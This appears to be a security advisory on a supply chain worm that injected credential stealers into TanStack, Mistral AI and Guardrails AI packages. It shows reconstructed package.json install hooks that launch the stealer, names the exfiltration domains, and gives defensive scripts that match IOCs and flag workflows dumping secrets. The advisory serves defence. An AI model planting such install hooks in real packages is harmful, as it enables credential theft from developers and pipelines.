
Mini Shai-Hulud Supply Chain Worm Compromises Mistral AI, Guardrails AI and TanStack Packages

TL;DR CRITICAL
  • What happened: TeamPCP injected credential-stealing malware into AI and developer npm/PyPI packages via chained GitHub Actions exploits.
  • Who's at risk: Developers and organisations consuming TanStack, Mistral AI, Guardrails AI, UiPath, or OpenSearch packages are directly exposed to credential theft and CI/CD pipeline compromise.
  • Act now: Audit all installed versions of affected packages and update to clean releases immediately · Rotate all GitHub tokens, cloud provider credentials, and CI/CD secrets on affected machines · Review GitHub Actions workflows for unauthorised modifications and restrict pull_request_target trigger permissions

Overview

A threat actor tracked as TeamPCP has launched a sweeping supply chain campaign, dubbed Mini Shai-Hulud, targeting npm and PyPI packages from TanStack, Mistral AI, Guardrails AI, UiPath, and OpenSearch. The campaign introduces an obfuscated credential stealer capable of harvesting secrets from cloud providers, cryptocurrency wallets, AI tooling, messaging applications, and CI/CD systems. The TanStack compromise has been assigned CVE-2026-45321 (CVSS 9.6), impacting 42 packages and 84 versions.

Technical Analysis

The attack uses two distinct infection vectors depending on the target package ecosystem:

TanStack cluster: A malicious JavaScript file (router_init.js) is embedded directly in the package tarball. An optional dependency pointing to a GitHub-hosted package is added; that dependency contains a prepare lifecycle hook which executes the payload via the Bun runtime. The initial staging exploits a chained GitHub Actions vulnerability — specifically the pull_request_target trigger combined with Actions cache poisoning and runtime memory extraction of an OIDC token from the runner process.
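The consumer-side hook chain described above can be sketched as two package.json fragments. These are illustrative reconstructions of the pattern, not the actual malicious manifests; the dependency and organisation names are placeholders:

```json
{
  "name": "victim-package",
  "optionalDependencies": {
    "helper-pkg": "github:attacker-org/helper-pkg"
  }
}
```

The GitHub-hosted dependency then carries the lifecycle hook that runs the embedded payload under Bun:

```json
{
  "name": "helper-pkg",
  "scripts": {
    "prepare": "bun router_init.js"
  }
}
```

Because prepare fires automatically when a package is installed from a git source, no action by the victim beyond a routine install is required.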

Mistral AI cluster: Follows an earlier TeamPCP pattern — the package.json preinstall hook is replaced to invoke node setup.mjs, which downloads Bun and runs the same JavaScript stealer.
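The Mistral-cluster tampering amounts to a one-line manifest change. The fragment below is a hedged reconstruction of the pattern described above, not the actual published manifest:

```json
{
  "scripts": {
    "preinstall": "node setup.mjs"
  }
}
```

On install, setup.mjs fetches the Bun runtime and hands off to the same JavaScript stealer used in the TanStack cluster.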

Exfiltration routes include:

  • Primary: Data sent to filev2.getsession[.]org, leveraging Session Protocol infrastructure to avoid enterprise blocklists.
  • Fallback: Encrypted data committed to attacker-controlled GitHub repositories using stolen tokens via the GitHub GraphQL API, attributed to [email protected].
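Both exfiltration routes resolve to fixed domains, so egress logs can be swept retroactively. The sketch below assumes a whitespace-separated log format with the destination host in the final field; adapt the parsing to your proxy or DNS log schema. The two IOC domains are those named in this report (defanging brackets removed):

```python
# Known Mini Shai-Hulud exfiltration endpoints (defanged in prose above).
IOCS = {"filev2.getsession.org", "api.masscan.cloud"}

def match_iocs(log_lines, iocs=IOCS):
    """Return log lines whose destination host matches an IOC domain
    exactly or as a parent domain (e.g. a subdomain of it)."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if not parts:
            continue
        # Assumption: destination host is the last whitespace-separated field.
        host = parts[-1].lower().rstrip(".")
        if any(host == d or host.endswith("." + d) for d in iocs):
            hits.append(line)
    return hits
```

A single hit warrants treating every credential on the source host as compromised.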

Persistence mechanisms include hooks injected into Claude Code and VS Code IDE startup sequences, a gh-token-monitor service for continuous GitHub token re-exfiltration, and two rogue GitHub Actions workflows that serialise repository secrets to JSON and upload them to api.masscan[.]cloud.
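The rogue workflows can be hunted for with a simple repository sweep. In this sketch, both indicator strings are assumptions drawn from the behaviour described above (a full secrets-context dump and the known upload endpoint), not confirmed byte-for-byte signatures:

```python
import re
from pathlib import Path

# Hypothetical indicators for the rogue workflows described above:
# serialising the full secrets context to JSON, and the exfil endpoint.
SUSPICIOUS = [
    re.compile(r"toJSON\(secrets\)", re.I),  # dumps every repository secret
    re.compile(r"api\.masscan\.cloud"),      # known upload destination
]

def scan_workflows(repo_dir):
    """Return the names of workflow files containing any indicator."""
    flagged = []
    for wf in Path(repo_dir, ".github", "workflows").glob("*.y*ml"):
        text = wf.read_text(errors="ignore")
        if any(p.search(text) for p in SUSPICIOUS):
            flagged.append(wf.name)
    return sorted(flagged)
```

Run it across every repository the affected GitHub tokens could reach, not only the ones where compromised packages were installed.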

Framework Mapping

  • AML.T0010 (ML Supply Chain Compromise): Core attack vector — malicious code injected into widely-used AI and developer packages.
  • AML.T0047 (ML-Enabled Product or Service): Mistral AI and Guardrails AI packages directly targeted, compromising AI toolchain integrity.
  • AML.T0018 (Backdoor ML Model): Startup hooks injected into Claude Code give the attacker a durable foothold inside AI development workflows.
  • LLM05 (Supply Chain Vulnerabilities): Package-level compromise of AI SDK dependencies represents a direct OWASP LLM supply chain risk.
  • LLM06 (Sensitive Information Disclosure): Credential and secret exfiltration from AI development environments.

Impact Assessment

The blast radius is significant. Any developer who installed affected TanStack, Mistral AI, or Guardrails AI package versions may have had cloud credentials, GitHub tokens, CI/CD secrets, and AI API keys exfiltrated. Organisations using these packages in automated pipelines face compounded risk — injected GitHub Actions workflows could propagate secrets theft across entire repository ecosystems. The use of Session Protocol infrastructure for exfiltration reduces detection likelihood in enterprise environments that permit the domain.

Mitigation & Recommendations

  1. Immediately audit installed versions of TanStack, Mistral AI, Guardrails AI, UiPath, and OpenSearch packages against the confirmed malicious version list.
  2. Rotate all secrets — GitHub tokens, cloud provider API keys, CI/CD environment variables, and AI platform credentials on any affected systems.
  3. Review GitHub Actions workflows across all repositories for unauthorised additions; restrict pull_request_target trigger usage and enforce least-privilege OIDC token scopes.
  4. Scan for persistence artefacts in Claude Code and VS Code extension directories and startup hooks.
  5. Block or monitor outbound traffic to filev2.getsession[.]org and api.masscan[.]cloud.
  6. Enable npm and PyPI provenance attestation where available to reduce future supply chain exposure.
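Step 1 above can be scripted against the output of `npm ls --all --json`. The bad-version mapping below is a placeholder to be populated from the vendor advisories; the entry shown is illustrative, not a real indicator:

```python
# Placeholder: populate from the confirmed malicious version list in the
# vendor advisories. The entry below is hypothetical, for illustration.
BAD = {"@tanstack/router-example": {"1.2.3"}}

def affected(tree, bad=None):
    """Walk an `npm ls --all --json` dependency tree and return every
    (name, version) pair that appears in the bad-version mapping."""
    bad = BAD if bad is None else bad
    hits = []

    def walk(deps):
        for name, meta in (deps or {}).items():
            if meta.get("version") in bad.get(name, set()):
                hits.append((name, meta["version"]))
            walk(meta.get("dependencies"))

    walk(tree.get("dependencies"))
    return hits

# Usage, from a project directory:
#   import json, subprocess
#   out = subprocess.run(["npm", "ls", "--all", "--json"],
#                        capture_output=True, text=True).stdout
#   print(affected(json.loads(out)))
```

Walking the full tree matters here: the TanStack vector arrives through an optional dependency, so a top-level check alone will miss transitive installs.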
